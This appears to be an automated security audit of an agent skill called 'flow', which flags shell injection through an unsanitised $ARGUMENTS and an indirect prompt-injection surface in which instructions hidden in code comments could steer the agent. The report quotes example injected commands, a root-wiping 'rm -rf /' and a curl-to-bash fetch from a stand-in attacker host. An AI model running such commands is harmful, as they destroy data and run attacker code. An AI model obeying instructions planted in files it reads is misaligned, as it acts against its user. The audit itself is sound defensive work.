flow

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGH (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): The instruction yarn flow $ARGUMENTS is vulnerable to shell injection. Because $ARGUMENTS is interpolated directly into a shell command without sanitization, an attacker could provide input like ; rm -rf / or ; curl http://attacker.com/exploit | bash to execute arbitrary code on the host system.
  • [PROMPT_INJECTION] (HIGH): The skill exposes a high-severity Indirect Prompt Injection surface (Category 8).
      1. Ingestion points: The skill ingests untrusted source code and user-provided arguments to perform type checking.
      2. Boundary markers: None are present to delimit untrusted data from the agent's instructions.
      3. Capability inventory: The skill has the capability to execute shell commands via yarn.
      4. Sanitization: There is no escaping or validation of the input arguments or the content of the files being processed.
    This allows malicious instructions embedded in code comments or arguments to potentially control the agent's actions.
Recommendations
  • AI detected serious security threats
Audit Metadata
  • Risk Level: HIGH
  • Analyzed: Feb 16, 2026, 06:03 AM